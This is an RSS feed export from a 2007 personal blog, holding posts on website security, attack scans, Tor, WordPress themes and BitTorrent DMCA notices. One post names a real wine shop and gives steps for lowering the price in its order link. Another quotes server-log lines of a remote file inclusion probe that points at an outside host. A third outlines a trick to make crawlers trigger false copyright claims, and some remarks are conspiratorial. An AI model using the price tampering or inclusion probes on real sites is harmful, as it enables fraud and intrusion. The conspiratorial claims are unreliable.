<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>xiandos world</title>
	<atom:link href="http://xiando.livelyblog.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://xiando.livelyblog.com</link>
	<description>Just another Livelyblog.com weblog</description>
	<pubDate>Sun, 30 Dec 2007 13:06:00 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6</generator>
	<language>en</language>
			<item>
		<title>Weingut-martin&#8217;s excellent security-designed website</title>
		<link>http://xiando.livelyblog.com/2007/12/30/weingut-martins-excellent-security-designed-website/</link>
		<comments>http://xiando.livelyblog.com/2007/12/30/weingut-martins-excellent-security-designed-website/#comments</comments>
		<pubDate>Sun, 30 Dec 2007 12:59:03 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Computer technology]]></category>

		<category><![CDATA[Internet]]></category>

		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/12/30/weingut-martins-excellent-security-designed-website/</guid>
		<description><![CDATA[The wine webshop&#160;http://www.weingut-martin.de/ is this weeks winner of my brand new Best Security Ever award.

Visit their site, http://www.weingut-martin.de/
Find something you want to order.
Look at the link to Kaufen (buy): (link cut here to avoid very long line):
http://www.weingut-martin.de/warenkorb.php?cmd=new \
&#38;bestell=2612 \
&#38;name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken \
&#38;preis=4.80&#38;tip=boxbeutel
Notice how preis (price) is part of this link. Don&#8217;t just click Kaufen to buy, copy [...]]]></description>
			<content:encoded><![CDATA[<p>The wine webshop&nbsp;<a href="http://www.weingut-martin.de/" title="http://www.weingut-martin.de/" target="_blank">http://www.weingut-martin.de/</a> is this weeks winner of my brand new <strong>Best Security Ever</strong> award.</p>
<ol>
<li>Visit their site, <a href="http://www.weingut-martin.de/">http://www.weingut-martin.de/</a></li>
<li>Find something you want to order.</li>
<li>Look at the link to Kaufen (buy): (link cut here to avoid very long line):<br />
http<em>:</em>//www.weingut-martin<em>.</em>de/warenkorb.php?cmd=new \<br />
&amp;bestell=2612 \<br />
&amp;name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken \<br />
&amp;preis=4.80&amp;tip=boxbeutel</li>
<li>Notice how <em>preis </em>(price) is part of this link. Don&#8217;t just click Kaufen to buy, <em>copy the url</em> and <em>change the &amp;preis</em> variable to something like 0.50 and paste that link into your browser&#8230;</li>
<li>Cheap wine!</li>
</ol>
<p>Now, I&#8217;m not saying you should actually go ahead and do this and finalize the order (which actually works). I&#8217;m just saying that <strong>that is a <em>great</em> security design right there. </strong>really thought-through.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/12/30/weingut-martins-excellent-security-designed-website/feed/</wfw:commentRss>
		</item>
		<item>
		<title>What, oh What are the Pakihackers up to?</title>
		<link>http://xiando.livelyblog.com/2007/08/14/what-oh-what-are-the-pakihackers-up-to/</link>
		<comments>http://xiando.livelyblog.com/2007/08/14/what-oh-what-are-the-pakihackers-up-to/#comments</comments>
		<pubDate>Tue, 14 Aug 2007 16:10:01 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Computer technology]]></category>

		<category><![CDATA[Internet]]></category>

		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/08/14/what-oh-what-are-the-pakihackers-up-to/</guid>
		<description><![CDATA[The Pakihackers started showing up in various hitlogs reciently.
Hitlog evidence
Hitlog story regarding the Pakihackers Corp. is this:
 220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] &#8220;GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 8269 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] &#8220;GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 22871 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] &#8220;GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 8206 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;
Bad for your server
Everything indicates that [...]]]></description>
			<content:encoded><![CDATA[<p>The <strong><em>Pakihackers </em></strong>started showing up in various hitlogs reciently.</p>
<h2>Hitlog evidence</h2>
<p>Hitlog story regarding the Pakihackers Corp. is this:</p>
<blockquote><p> 220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] &#8220;GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 8269 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;<br />
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] &#8220;GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 22871 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;<br />
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] &#8220;GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1&#8243; 404 8206 &#8220;-&#8221; &#8220;libwww-perl/5.808&#8243;</p></blockquote>
<h2>Bad for your server</h2>
<p>Everything indicates that Pakihackers are very bad for you and your server(s).</p>
<blockquote><p>130.232.220.in-addr.arpa. 10800 IN      SOA    &nbsp;<a href="http://ns1.pacific.net" title="http://ns1.pacific. " target="_blank">ns1.pacific.net</a>.hk.&nbsp;<a href="http://postmaster.pacific.net" title="http://postmaster.pacific. " target="_blank">postmaster.pacific.net</a>.hk</p></blockquote>
<p>It really did not make me shocked to learn that Pakihackers are <strong><em>.hk</em></strong> based. It does look like they are doing automatic checks for some kind of WP/WPMU exploit of somekind.</p>
<p>Pakihackers scanning is not dangerous if you are using recient versions of WPMU (v.1.2.3 / v1.2.4). But it&#8217;s kind of annoying, because they keep on hammering these lame requires all day long. Perhaps pakihackers are bad for you if you&#8217;re using some ancient WP version, who knows.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/08/14/what-oh-what-are-the-pakihackers-up-to/feed/</wfw:commentRss>
		</item>
		<item>
		<title>The power of social engineering</title>
		<link>http://xiando.livelyblog.com/2007/07/19/the-power-of-social-engineering/</link>
		<comments>http://xiando.livelyblog.com/2007/07/19/the-power-of-social-engineering/#comments</comments>
		<pubDate>Thu, 19 Jul 2007 04:05:16 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Social engineering]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/07/19/the-power-of-social-engineering/</guid>
		<description><![CDATA[Social engineering is a very nice tool. It bullet summary it simply means interacting with one or more people in order to archive an objective. If you, for example, are in the same room as your adversary and you need to replace his pen with a identical pen which contains a microphone then all you [...]]]></description>
			<content:encoded><![CDATA[<p>Social engineering is a very nice tool. It bullet summary it simply means interacting with one or more people in order to archive an objective. If you, for example, are in the same room as your adversary and you need to replace his pen with a identical pen which contains a microphone then all you have to do is to ask this person to go get something, anything at all, and replace the pen.</p>
<p>The concept is frequently mentioned both in shadowy secret meetings with corporate leadership and members from the intelligence community. It is also sometimes mentioned on IRC in relation to &#8220;xiando&#8221;.</p>
<p>04:40 -!- Irssi: Join to #tor was synced in 8 secs<br />
04:44 &lt; arma&gt; good point. do feel free to fix it <img src='http://xiando.livelyblog.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /><br />
05:15 &lt; Armedblowfish&gt; Is xiando an operator on this channel?<br />
05:15 &lt; arma&gt; not that i know of<br />
05:15 &lt; Armedblowfish&gt; Then how would he/she fix it?<br />
05:16 &lt; coderman&gt; social engineering<br />
05:16 &lt; croup&gt; rubber hoses<br />
05:16 &lt; coderman&gt; weasel can be presuaded&#8230; with a little effort or hard cash&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/07/19/the-power-of-social-engineering/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Tor to get IPv6 support?</title>
		<link>http://xiando.livelyblog.com/2007/06/04/tor-to-get-ipv6-support/</link>
		<comments>http://xiando.livelyblog.com/2007/06/04/tor-to-get-ipv6-support/#comments</comments>
		<pubDate>Tue, 05 Jun 2007 01:03:44 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Computer technology]]></category>

		<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/06/04/tor-to-get-ipv6-support/</guid>
		<description><![CDATA[Tor is a great traffic analysis communications system which as of now, sadly, only allows you to use IPv4 services anonymously and securely.
Xiando SIGiNT has picked up a lot of chatter about IPv6 support being added to Tor on #tor at oftc. It is strongly indicated that Tor will be able to connect to IPv6-only [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://tor.eff.org/">Tor</a> is a great traffic analysis communications system which as of now, sadly, only allows you to use IPv4 services anonymously and securely.</p>
<p>Xiando SIGiNT has picked up a lot of chatter about IPv6 support being added to Tor on #tor at oftc. It is strongly indicated that Tor will be able to connect to IPv6-only websites in the very near future. This means that Tor-users will be able to enjoy the world of IPv6 services securely without actually having IPv6 themselves.</p>
<p>This may not sound like breaking news, but oh it is, it&#8217;s very good news indeed. IPv6 has already become the dominant standard in civilized parts of the world such as Japan, and some of the sites in these countries are only available to IPv6 users. Foregin devils Tor-users who only have IPv4 may be able to experience these sites in the close future - if the chatter picked up by xiando SIGiNT is close to correct.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/06/04/tor-to-get-ipv6-support/feed/</wfw:commentRss>
		</item>
		<item>
		<title>So I&#8217;ve decided to write my own WordPress themes</title>
		<link>http://xiando.livelyblog.com/2007/04/08/so-ive-decided-to-write-my-own-wordpress-themes/</link>
		<comments>http://xiando.livelyblog.com/2007/04/08/so-ive-decided-to-write-my-own-wordpress-themes/#comments</comments>
		<pubDate>Sun, 08 Apr 2007 06:18:54 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/04/08/so-ive-decided-to-write-my-own-wordpress-themes/</guid>
		<description><![CDATA[WHY? Because the truth is that most existing WordPress themes suck. And believe me, I&#8217;ve tried dozens. I manage the themes at Livelyblog, a free blogging service which now has over 150 themes available to it&#8217;s users. And that is a very low number compared to the number of theme&#8217;s I&#8217;ve tried out in my [...]]]></description>
			<content:encoded><![CDATA[<p>WHY? Because the truth is that <em>most existing WordPress themes <strong>suck</strong></em>. And believe me, I&#8217;ve tried dozens. I manage the themes at Livelyblog, a free blogging service which now has over 150 themes available to it&#8217;s users. And that is a <em>very low</em> number compared to the <em>number of theme&#8217;s I&#8217;ve tried out</em> in my quest for a huge variety of themes random strangers <em>may</em> like.  There are about 2000+ themes in the <a href="http://themes.wordpress.net/">official WordPress Theme directory</a>, and I&#8217;d say that about 10%, or perhaps 200, are remotely close to alright. Most are just <em>slightly modified rippoff-themes designed for linkspam, broken or plain ugly. </em>So I decided to <em>write my own theme</em>.</p>
<h2>Why, what&#8217;s wrong with 90% of the WordPress themes out there?</h2>
<p>A whole lot. Including..</p>
<h3>Spamthemes.</h3>
<p>The most annoying thing is that <em>most themes are made by people doing &#8220;Search Engine Optimization&#8221;</em> in the <em>forbidden</em> way: They make a theme, place links to their own site and &#8220;sponsors&#8221; on it, and hope that these links - when placed on various websites - generate enough backlinks to give themselves and their sponsors high rankings in search-engines.</p>
<p>This, like all other <em>black hat</em> SEO, doesn&#8217;t work in the long run. <a href="http://www.google.jp/">Google</a> and <a href="http://technorati.com/">Technorati</a>, for example, will just nuke you for not following their webmaster guidelines (and general politeness) if you do &#8220;template-linkspamming&#8221;, but nobody seems to care.</p>
<p>There are (at least) <em>two</em> things wrong with every spamtheme:</p>
<ul>
<li>They are just some other theme which is <em>slightly</em> modified (duplicate)</li>
<li>They claim to be &#8220;widget&#8221;-ready while they in reality are not, the typical problem being that the &#8220;Meta&#8221; section in the sidebar is excluded from the if dynamic_sidebar.. endif; (in order to get the linkspam shown to widget-users)</li>
<li>The header, and sometimes other theme files are full og spam links (hey, what&#8217;s up with placing SEO-type links in <em>comments.php</em>? Hope people don&#8217;t notice, eh?</li>
</ul>
<p>It&#8217;s also interesting to note that most <em>spamthemes</em> are released under the &#8220;<a href="http://creativecommons.org/licenses/by-nc-sa/2.5/">Creative Commons Attribution Non Commercial ShareAlike</a>&#8221; license, and the extra term is mostly &#8220;You can&#8217;t remove the links&#8221;, which pretty much rules out using most of these themes - <em>unless</em> you choose to (safely) <em>ignore</em> the &#8220;terms&#8221;.  The reason you can <em>ignore </em>these terms is that <em>many </em>themes are GNU GPL licensed. Yes, there are <em>spam</em>theme authors who release under GNU GPL and claim you can&#8217;t remove their spam-links, too, and these &#8220;designers&#8221; <em>really should read it</em> - because you <em>can</em> remove any spam-links under the GNU GPL (yeah, you have to point out who originally made the theme, but it is enough to inform that in a file called &#8220;readme.txt&#8221; in a re-released .zip file). The reason this mostly applies to the &#8220;Attribution Non Commercial ShareAlike&#8221;-licensed themes too <em>is that most of these themes are actually based on Kubrick or some other GPL-licensed theme.</em> This means that &#8220;Attribution Non Commercial ShareAlike&#8221; re-releases are void by default&#8230;</p>
<p>But it is equally annoying that..</p>
<h2>Most WordPress themes require you to edit them</h2>
<p>WordPress and WPMU have a nice editor, a feature rich interface and is generally user-friendly. So <em>why</em> do most theme designers <em>expect</em> the users to <em>hand-edit</em> the theme-files? <em>Close to none</em> of the WP themes available today <em>work out of the box</em>. The themes designed purely for <em>linkspamming</em>, as mentioned above, obviously require editing away the links &#8220;when allowed&#8221;, but that&#8217;s just the start.</p>
<p>Some themes, like <a href="http://www.jauhari.net/themes/tukulr">Tukulr</a> by <a href="http://www.jauhari.net/">Nurudin Jauhari</a>, have this cute little &#8220;About me&#8221; box all worked up with some default text <em>in functions.php </em>and some nice graphics. This obviously requires the user <em>to edit the text in the themes php files </em>before using it. And the text being in <em>functions.php</em> and not <em>sidebar.php</em> makes it kind of hard to find. It must be noted that the <em>profile page</em>, which can be <em>edited from within WP, </em>has such a field - which can be called with <strong>the_author_description() </strong>(or get_the_author_description(), if you want to use it in a variable) and <em>thus; there is absolutely no need to require the user to edit the theme file for showing &#8220;about me&#8221;..</em></p>
<p>Editing theme files is <em>just fine</em> if you&#8217;re not afraid to open a PHP file, but <em>if</em> you barely know how to install it.. this is <em>very bad</em> and really should be avoided. And <em>most people</em> are <em>not</em> theme designers,or PHP programmers, and <em>don&#8217;t know</em> how to edit php files.</p>
<p>I really do think that more WP theme designers should <em>make sure</em> the theme <em>works right out of the box without editing any of the themes files</em>.</p>
<p>And then there is the big problem of..</p>
<h3>Many WordPress themes are actually broken in WP 2.1/WPMU 1.2.x.</h3>
<p>This may not be entirely all <em>theme designers fault, </em>but fact of the matter is that many themes, like <a href="http://www.noelcower.com/190">Spiffy</a>, use things like:</p>
<p><strong><em>$link_cats = $wpdb-&gt;get_results(&#8221;SELECT cat_id, cat_name FROM $wpdb-&gt;linkcategories&#8221;);</em></strong></p>
<p>to print out the categories - this may have worked, but it doesn&#8217;t work with the latest version of WP/WPMU.  It&#8217;s interesting that the comments field in that theme suggusts using:</p>
<p><em><strong>$link_cats = $wpdb-&gt;get_results(&#8221;SELECT cat_id, cat_name FROM $wpdb-&gt;categories WHERE link_count &gt; &#8216;0&#8242;&#8221;);</strong></em></p>
<p>instead, however: What&#8217;s so wrong with <a href="http://codex.wordpress.org/Template_Tags/wp_list_categories"><strong>wp_list_categories()</strong></a>? It&#8217;s got <em>plenty</em> of advanced options and there really <em>isn&#8217;t</em> any good reason to call the database to list the categories - or do anything else for that matter.. WP can take care of it!</p>
<h3>..and the annyoing lack of advanced WP features</h3>
<p>WP now allows the user to change theme top picture from within WP - <em>if</em> the theme supports it. I&#8217;ve <em>slightly modified</em> dozens of themes to support this - it&#8217;s a shame that close to zero support it by default. It&#8217;s easy to fix this in 5 minutes, but 5 minutes times 50 times become.. a lot of time. It really isn&#8217;t that much trouble for someone who maintains a theme to change it so the header-picture can be changed, and fixing this is speically easy if you already know how the CSS and PHP files of a theme work - or you have to look at them to see where/how the header pic is loaded, which steals yet a few more minutes&#8230;</p>
<h2>And then there is the brutal fact: Most themes are <em>ugly</em>.</h2>
<p>Which is the primary reason I am going to write my own theme, finally. I <em>really</em> want <em>something very simple yet very pretty. </em>This may, obviously, turn out to be something <em>completely different</em> from what other people find pretty, but still: As said, I have installed over 160+ themes at the free blogging service <a href="http://livelyblog.com/">Livelyblog.com</a>, I&#8217;ve looked at propbably more than 500+ WP themes, and none of them are <em>really</em> smashing.</p>
<h2>My plan.</h2>
<p>Just to share some basic ideas: I am going to try to make <em>one basic theme</em> to build on using the <a href="http://codex.wordpress.org/Theme_Development"><em>Template: themefolder</em></a> tag which is available for WP themes. This means that I can write the php files <em>once</em> and then <em>make other themes</em> which only include style.css, images and changed core files - if any. I find it strange that nobody is using this when they release like 5 themes who look almost the same and  there is no difference between their PHP files&#8230; I&#8217;d also like the theme to support all the latest WP features like widgets (not really a buildt-in feature, but it&#8217;s as good as one..) and header image changing from within WP.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/04/08/so-ive-decided-to-write-my-own-wordpress-themes/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to send spammers &#8220;Copyright violation&#8221; DMCA notices for BitTorrent piracy</title>
		<link>http://xiando.livelyblog.com/2007/03/26/how-to-send-spammers-copyright-violation-dmca-notices-for-bittorrent-piracy/</link>
		<comments>http://xiando.livelyblog.com/2007/03/26/how-to-send-spammers-copyright-violation-dmca-notices-for-bittorrent-piracy/#comments</comments>
		<pubDate>Tue, 27 Mar 2007 02:25:02 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[BitTorrent]]></category>

		<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/03/26/how-to-send-spammers-copyright-violation-dmca-notices-for-bittorrent-piracy/</guid>
		<description><![CDATA[My ISP have gotten quite a lot of spam lately from lawfirms about supposed BitTorrent piracy of movies and television shows I&#8217;ve never heard of - which is annoying. I also see quite a lot of crawling done by web spiders who do not obey robots.txt. These spiders look for e-mail addresses and spam them [...]]]></description>
			<content:encoded><![CDATA[<p>My ISP have gotten quite a lot of <em>spam</em> lately from lawfirms about supposed BitTorrent piracy of movies and television shows I&#8217;ve never heard of - which is annoying. I also see quite a lot of crawling done by web spiders who do not obey robots.txt. These spiders look for e-mail addresses and spam them - which is also annoying. Can these annoying things <em>be combined?</em> Yes, they can.</p>
<h2>&#8220;Copies of the Warner Brothers Movie &#8220;300&#8243; are being torrented from your server identified herein&#8221;</h2>
<p>..said one of the letters my ISP got from Marc Brandon, Vice-President, Anti-Piracy Internet Operations, Warner Bros. Entertainment Inc a few weeks ago. The problem with their story is that the movie <em>300</em> was <em>not</em> being torrented from the server in question, the references file had never been on the server, and I had never even heard of the movie &#8220;300&#8243; until I got this notice.</p>
<p>And more <em>spam</em> with claims of &#8220;Copyright violation&#8221; of other movies and TV-shows I&#8217;d never heard of - nor had on my server - ticked in at my ISP the following weeks.</p>
<h3>How BitTorrent works</h3>
<p>BitTorrent works like this: You download a torrent file which contains a HASH for a file and a tracker IP and port. Your BitTorrent then connects to the tracker, gets a list of other peers and then connects to these peers to get parts of the file(s) the torrent has hashes for.</p>
<p>It seems clear from the supposed &#8220;copyright violation&#8221; claims that the DMCA notice <em>spamming</em> corporations such as Warner Bros. hire corporations who just go to trackers, download the list of IPs listed there and then claim every IP listed on that tracker is somehow hosting a copy of their file.</p>
<p>However, trackers are just URL resources, just like other resources on the Internet - and look like this:</p>
<blockquote><p>http://tpb.tracker.thepiratebay.org/announce<br />
?info_hash=%09%15%2A%5F%90%5Bh%80%84%EA%40p%3Fh%83%27%CE%2F%8C%F4<br />
&amp;peer_id=CeceshdyTiWhakceof<br />
&amp;port=7882<br />
&amp;uploaded=292230758<br />
&amp;downloaded=0<br />
&amp;left=1461153792<br />
&amp;event=started<br />
&amp;numwant=100<br />
&amp;compact=1</p></blockquote>
<p>If you visit <a href="http://tpb.tracker.thepiratebay.org/announce?info_hash=%09%15%2A%5F%90%5Bh%80%84%EA%40p%3Fh%83%27%CE%2F%8C%F4&amp;peer_id=CeceshdyTiWhakceof&amp;port=7882&amp;uploaded=292230758&amp;downloaded=0&amp;left=1461153792&amp;event=started&amp;numwant=100&amp;compact=1">that URL</a> then you&#8217;re supposedly sharing the file, according to Anti-Piracy Internet Operations at Warner Bros. It is also interesting to note that<em> tracker URLs can be inserted in HTML image tags </em>(&lt;img src=&#8221;http://tracker&#8230;/announce?&#8230;&#8221; /&gt;) on websites - which means that anyone who visits this sites (including web crawlers) gets their IP listed on the tracker - without sharing - or even having heard of - the file the trackers tracking.</p>
<p><strong>But why are they spamming <em>me</em>?</strong></p>
<p>Why are they spamming me with DMCA notices about files I&#8217;m <em>not</em> distributing and never heard of<u></u>? Short answer: I don&#8217;t know.</p>
<p>Maby they just don&#8217;t like that I run <a href="http://torrentchannel.com/">The TorrentChannel</a>, a legal BitTorrent site which documents Warner Bros. involvement with mass murderer and crimes against humanity and therefore make up that IPs used to seed <em>legal torrents who are available at that site</em> are somehow being used to distribute <em>torrents who are <strong>not</strong> distributed from that site&#8217;s seed servers. </em>They can&#8217;t just tell my ISP &#8220;This website presents information which goes against our propaganda, please shut it down&#8221;, but they <em>can</em> claim &#8220;copyright violation&#8221; of some random file.</p>
<p><strong>It may also be </strong>that they actually visited a load of trackers, pulled down their list of IPs and <em>spammed</em> everyone listed in the trackers - including my servers IPs, <em>if </em>they were indeed on the trackers references in the DMCA-notice spams to my ISP. This could happen for a number of reasons:</p>
<p><strong>1 .</strong> <a href="http://opentracker.blog.h3q.com/?p=22">Some trackers are now adding <em>random valid IPs</em> among the trackers list of peer IPs</a>. This may <em>sound</em> like a good idea at first blush, but if my ISP is getting <em>spammed</em> with DMCA notices because trackers are mixing in IPs of computers used to seed <em>legal torrents</em> among the tracker results of <em>copyrighted content</em> then those doing this should realize that the movie industry just spams any IP on a tracker, which means that the effect is that <em>random people get spam</em> from MPAA members because of it.</p>
<p><strong>2.</strong> Computers used to seed legal torrents for <a href="http://torrentchannel.com/">The TorrentChannel</a> are also web crawling for the search engine <a href="http://yacysearch.com/">YacySearch.com</a>. If this web crawler goes through a bittorrent website then it&#8217;s suddenly supposedly &#8220;violating the copyright&#8221; of a whole range of Hollywood propaganda producers. This is how I got the idea on how to make <em>the movie industry</em> send their spam to <em>traditional spammers.</em></p>
<p><strong>3.</strong> I support the <a href="http://tor.eff.org/">Tor anonymity network</a> by running Tor-servers. This helps people in tyrannical regimes like Norway and China use the Internet without fear of being tortured by their government for reading the wrong thing. It is possible to  exit from the Tor-network and scrape a tracker. It is also possible to exit to BitTorrent clients from some Tor-servers - and <a href="http://tor.eff.org/eff/tor-dmca-response.html">this is  covered by DMCA safe harbor</a>.  However, Tor exits can set their own exit policy. I want to support people <em>who want to browse the web</em> without fear of being tortured, but don&#8217;t see the point in supporting BitTorrent over Tor - so I block the typical BitTorrent ports at my exits. This means that <em>if</em> someone exited from my Tor exit <em>to a tracker</em> then that would be <em>the only thing </em>they were doing from my exit. It is <em>not</em> be possible to connect to other BitTorrent peers using the my exits, and nobody would be able to connect to the user who exited to a tracker through my exit-node.</p>
<p><strong>So in summary: </strong>The only one of the above possible reasons for the <em>numerous</em> spam messages my ISP have recieved over the last few weeks about &#8220;DMCA Copyright Violation&#8221; which could <em>even remotely have something to do with my server</em>s would be that someone <em>exited from the Tor-network and <strong>scraped a tracker</strong></em>.</p>
<p>Someone exiting from the Tor-network to scrape a BitTorrent tracker is <em>not even remotely </em>the same as &#8220;distributing content&#8221; - and that&#8217;s <em>only one of the many possible reasons why the movie industry are spamming my ISP.</em></p>
<p><strong>None of the claimed &#8220;pirated&#8221; files  mentioned in movie industry spam my ISP has recieved the last few weeks were ever on my server.</strong> I had actually never even heard of the movie &#8220;300&#8243; or HBO&#8217;s TV-show &#8220;Rome&#8221; before I got &#8220;copyright violation&#8221; <em>spam</em> which said I was &#8220;distributing&#8221; that content.</p>
<p>This clearly shows that the movie industry <em>have no idea</em> if those they send &#8220;copyrigth violation&#8221; <em>spam</em> to are actually distributing their content, and it seems perfectly clear that they don&#8217;t try to connect to any of the IPs they claim are distributing their content to see if they are actually running a BitTorrent client which is seeding the file in question, and so on. I use the term <em>spam</em> here because that&#8217;s how I view these claims now: It&#8217;s redicilous how many I&#8217;ve gotten the last two weeks and again: NONE of these claims were valid.</p>
<p>Now for the &#8220;gold&#8221;:</p>
<h2>How to make DMCA notice spammers spam traditional spammers</h2>
<p>A web crawler is a program which crawls the web and indexes websites content. Most crawlers are run by search-engines in order to make interesting pages appear among their search-results. The first thing a legitimate web crawler does when it visits a site is to download a copy of the Robots Exclution Standard instruction file <a href="http://www.robotstxt.org/">robots.txt</a>.</p>
<p>There are also quite a few web crawlers who are run by <em>spammers</em>. These crawlers look e-mail addresses  listed in web pages and produce a list which is later used to mass-mail junk like viagra advertisements. Such crawlers generally <em>do not</em> obey robots.txt, most of them don&#8217;t even read it.</p>
<p>The <em>trick</em> that can be used to <em>expose</em> such crawlers is to make a hidden link to /trap/ in a web page and deny /trap/ in robots.txt. Human visitors don&#8217;t see the link and well-behaved web crawlers ignore the link because it&#8217;s disallowed. Nothing but <em>misbehaved</em> web crawlers, most of which are used by spammers, will attempt to access your /trap/.</p>
<p>What you should put inside /trap/ is a plain .html file with <em>a bunch of links</em> to popular BitTorrent tracker&#8217;s <em>announce.php?</em> URLs. This will make spam-harvesting web-crawlers visit your /trap/, find learn the links and then <em>add themselves to various BitTorrent trackers</em> when they attempt to harvest e-mail addresses using those links. <strong>&#8220;Piracy&#8221;-hunters for the movie industry will then see the <em>spam-harvesting crawlers</em> as <em>BitTorrent users</em> and then pass their IPs on to the movie industry&#8217;s various law firms - who will then <em>spam the spammers</em> with DMCA &#8220;copyright violation&#8221; notices!</strong></p>
<h3>One last thing&#8230;</h3>
<p>Just a little note on piracy: Television shows like <em>24</em> are <em>pure propaganda</em> designed to promote the lie that the completely fake &#8220;war on terror&#8221; is real, that &#8220;Al-Qaida&#8221; is more than a myth and that torture is alright. Most Hollywood-produced movies and TV-shows are nothing but fascist propaganda. If you download copyrighted material produced by the mostly complicit-in-mass-murderer and highly criminal movie industry then you are <em>indirectly supporting it. </em>They can say &#8220;<em>Oh, look, people are pirating our shows!&#8221;</em> and claim that is why they spam those legally distributing content which goes against everything they would have people believe.</p>
<p>If everybody, including you, would just boycott the church of Hollywood and nobody viewed or downloaded their propaganda then they&#8217;d have to admit that their distribution model is a farse and that their lack of paying customers is due to their own stupidity. Suing the person who made it possible for me to view DVDs I bought and paid for on my own Linux-based computer?? DRM &#8220;protected&#8221; content, which you can&#8217;t even use on Linux?? Come on! The movie and music industries have loosing customers because they made it so hard to legally buy and use their products that it doesn&#8217;t seem to be worth it even if you <em>really</em> want to purchase their products, <em>not</em> because people are foolishly helping them spread their propaganda on the Internet using P2P software such as BitTorrent.. &#8220;Piracy&#8221; does provide a way to explain away their own mistakes, reasons to force new tyrannical laws upon the people and it even serves as a means to claim a higher number of viewers when negotiating &#8220;product placement&#8221; deals. Be aware that <em>you are supporting the evil movie industry</em> if you pirate their crappy propaganda content, even though the industry itself don&#8217;t realize - or won&#8217;t admit - that this is the case. Also, as explained above: If you&#8217;re supporting the movie industry then you&#8217;re supporting <em>spammers</em>.</p>
]]></content:encoded>
			<wfw:commentRss>http://xiando.livelyblog.com/2007/03/26/how-to-send-spammers-copyright-violation-dmca-notices-for-bittorrent-piracy/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Sphere Blog Search, crawling 9 pages in 16 seconds</title>
		<link>http://xiando.livelyblog.com/2007/03/23/sphere-blog-search-crawling-9-pages-in-16-seconds/</link>
		<comments>http://xiando.livelyblog.com/2007/03/23/sphere-blog-search-crawling-9-pages-in-16-seconds/#comments</comments>
		<pubDate>Fri, 23 Mar 2007 07:46:26 +0000</pubDate>
		<dc:creator>xiando</dc:creator>
		
		<category><![CDATA[Search Engines]]></category>

		<guid isPermaLink="false">http://xiando.livelyblog.com/2007/03/23/sphere-blog-search-crawling-9-pages-in-16-seconds/</guid>
		<description><![CDATA[I love web crawlers. They index pages and bring readers from search-engines. But some web crawlers are just annoying. Like those gathernig e-mail addresses for spammers. And Sphere Scout, which has a very odd hit-grab-and-run behavior.
Sphere Scout visited my blog, fetched robots.txt to check for permission to crawl and then and grabbed 9 pages in [...]]]></description>
			<content:encoded><![CDATA[<p>I love web crawlers. They index pages and bring readers from search-engines. But some web crawlers are just <em>annoying</em>. Like those gathernig e-mail addresses for spammers. And Sphere Scout, which has a very odd hit-grab-and-run behavior.</p>
<p><strong>Sphere Scout</strong> visited my blog, fetched <a href="http://www.robotstxt.org/">robots.txt</a> to check for permission to crawl and then and grabbed <em>9 pages in 16 seconds - </em>and that was it.</p>
<blockquote><p>64.40.115.32 - - [23/Mar/2007:02:42:05 -0400] &#8220;GET /robots.txt HTTP/1.0&#8243; 200 24 &#8220;-&#8221; &#8220;Sphere Scout&amp;v4.0 (beta) - scout at sphere dot com&#8221;<br />
